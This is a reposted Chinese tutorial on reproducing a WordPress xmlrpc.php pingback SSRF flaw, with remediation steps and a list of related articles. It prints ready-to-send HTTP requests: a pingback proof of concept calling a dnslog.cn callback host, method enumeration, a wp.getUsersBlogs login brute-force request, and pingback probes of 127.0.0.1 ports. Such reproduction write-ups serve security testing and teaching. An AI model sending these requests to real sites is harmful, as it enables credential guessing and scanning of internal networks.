复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

2024-04-02 19:04:59 645人浏览八月长安

摘要

目录一、漏洞介绍二、漏洞影响三、漏洞复现四、深入利用五、漏洞修复一、漏洞介绍通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery

一、漏洞介绍

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

二、漏洞影响

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序（比如溢出攻击）。
3、利用file协议读取本地文件等

三、漏洞复现

第一步：直接访问这个文件，初步判断

第二步：发现POC验证数据包

POST /xmlrpc.PHP Http/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/WEBp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

发送数据包

验证成功！

四、深入利用

（一）查看系统允许的方法

POST /Wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

（二）账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

（三）通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

（一）通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下：

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

（二）删除根目录下的xmlrpc.php。

到此这篇关于复现WordPress xmlrpc.php漏洞和SSRF的文章就介绍到这了,更多相关WordPress漏洞复现内容请搜索编程网以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程网！

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: 复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

本文链接: https://www.lsjlt.com/news/144939.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

目录一、漏洞介绍二、漏洞影响三、漏洞复现四、深入利用五、漏洞修复一、漏洞介绍通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery...

99+

2024-04-02
配置Nginx解决http host头攻击漏洞【详细步骤】

配置Nginx解决http host头攻击漏洞【详细步骤】前言1、进入nginx目录下2、修改nginx配置文件3、添加上后重启配置文件Nginx常用基本命令仰天大笑出门去，我辈岂是蓬蒿人...

99+

2023-08-31

nginx http 运维
ThinkPHP5系列远程代码执行漏洞复现（详细）

一：5.0.23-rce版本漏洞复现漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下可执行任意方法，从而导致远程命令执行漏洞。漏洞危害环...

99+

2023-08-31

网络安全 php 服务器 Powered by 金山文档
Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）（漏洞复现详细过程）

目录一、漏洞介绍二、漏洞环境搭建三、漏洞利用四、漏洞流量特征：一、漏洞介绍 CVE-2017-5645 是 Apache Log4j 服务器的一个反序列化命令执行漏洞，攻击者可以利用这个漏洞通过发送精心制作的请求，远程执行命令，...

99+

2023-09-02

log4j apache 服务器
MySQL的主从复制==＞详细步骤

目录前言一、准备工作 1、提前准备好两台服务器，分别安装Mysql 2、使用克隆弄出另一台服务器的注意事项二、配置==>主库Master 1、修改Mysql数据库的配置文件/etc/my.cnf 2、重启Mysql服务 3、登录M...

99+

2023-09-08

mysql 数据库 java
log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

漏洞原理啥是log4j2 log4j2是apache下的java应用常见的开源日志库，是一个就Java的日志记录工具。在log4j框架的基础上进行了改进，并引入了丰富的特性，可以控制日志信息输送的目的地为控制台、文件、GUI组建等，被应用...

99+

2023-09-02

网络安全 java apache 系统安全 log4j
SpringBoot自动配置实现的详细步骤

目录springboot如何实现一、依赖管理特性1. 父项目2. 场景启动器二、自动配置1. 自动配置组件2. 默认的包结构3. 各种配置拥有默认值4. 按需加载所有自动配置项三、小...

99+

2024-04-02
CentOS6.4下编译和安装MySQL5.6.14的详细步骤

本篇内容介绍了“CentOS6.4下编译和安装MySQL5.6.14的详细步骤”的有关知识，在实际案例的操作过程中，不少人都会遇到这样的困境，接下来就让小编带领大家学习一下如何处理这些情况吧！希望大家仔细阅读，能够学有所成！一：卸载旧版本使...

99+

2023-06-10
用XtraBackup搭建mysql主从复制的详细步骤

本篇内容介绍了“用XtraBackup搭建mysql主从复制的详细步骤”的有关知识，在实际案例的操作过程中，不少人都会遇到这样的困境，接下来就让小编带领大家学习一下如何处理这些情况吧！希望大家仔细阅读，能够...

99+

2024-04-02
win10转圈卡死修复的详细步骤教程

win10卡死在转圈怎么办很多小伙伴经常在开机的时候遇上这种问题,那就是电脑开机的时候就卡死了,一直转圈圈,按什么键都没有,这到底是怎么回事呢其实很多小伙伴经常询问小编有关于假死转圈圈的问题,不要慌!接下来小编教你win10卡死在转圈解决方...

99+

2023-07-11
vue3中使用vuex和vue-router的详细步骤

目录vuex 安装使用步骤index.js文件main.js文件组件中使用vuexvue-router安装基本配置index.jsmain.jsvue3中路由的使用axio...

99+

2022-12-08

vue3使用vuex vue3使用vue-router
C#实现网络点对点的详细步骤

这篇文章主要讲解了“C#实现网络点对点的详细步骤”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“C#实现网络点对点的详细步骤”吧！C#实现网络点对点具体步骤：在了解、掌握了关键问题及其解决方法...

99+

2023-06-17
PHP实现MySQL读写分离的详细步骤

在当今的互联网应用开发中，数据访问速度和稳定性是至关重要的。为了提高数据库性能，许多开发者选择实现MySQL的读写分离。PHP作为一种流行的后端编程语言，能够与MySQL数据库进行高效...

99+

2024-03-04

mysql php 分离数据访问
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接（复现详细过程）

漏洞介绍 ThinkPHP是国内使用极为广泛的PHP开发框架。由于框架处理控制器名称不正确，如果网站未启用强制路由（这是默认设置），它可以执行任何方法，从而导致 RCE 漏洞。影响版本：Thinkphp5 5....

99+

2023-10-20

php 安全开发语言
使用Java和Shell命令实现索引同步的详细步骤是什么？

随着数据量的不断增加，索引同步成为了许多企业必须面对的问题。在实际应用中，如果索引同步不及时，将会导致数据查询不到位，影响业务的正常运行。本文将介绍如何使用Java和Shell命令实现索引同步的详细步骤。一、环境准备在进行索引同步之前...

99+

2023-10-11

shell 索引同步
详细讲解PHP SDK的安装和使用步骤

PHP SDK是一款基于PHP语言开发的软件开发工具包。它可以方便地进行API接口开发和服务器端开发，为开发人员提供了更加便捷和高效的开发能力。但是对于一些新手开发者来说，PHP SDK的安装和使用却显得有些陌生和困难。下面我们来详细讲解P...

99+

2023-05-14

php sdk
Vue项目安装less和less-loader的详细步骤

目录第一步：查看webpack和webpack-cli是否安装第二步：确定webpack版本第三步：安装less和less-loader第四步：使用less总结第一步：查看webpa...

99+

2022-12-22

Vue安装less和less-loader Vue安装less Vue安装less-loader
基于Python和openCV实现图像的全景拼接详细步骤

基本介绍图像的全景拼接，即“缝合”两张具有重叠区域的图来创建一张全景图。其中用到了计算机视觉和图像处理技术有：关键点检测、局部不变特征、关键点匹配、RANSAC(Random Sa...

99+

2024-04-02
SpringBoot整合RocketMQ实现消息发送和接收的详细步骤

我们使用主流的SpringBoot框架整合RocketMQ来讲解，使用方便快捷；最终项目结构如下：具体步骤如下：第一步：新建SpringBoot项目rocketmq-test...

99+

2024-04-02
Python、PHP和Java下的反序列化漏洞复现实例

环境准备这篇文章旨在用于网络安全学习，请勿进行任何非法行为，否则后果自负。 python反序列化 p83 CTF夺旗 Python考点SST&反序列化&字符串_正经人_____的博客-CSDN博客 php反序列化 p84 CTF夺旗-P...

99+

2023-09-17

java 开发语言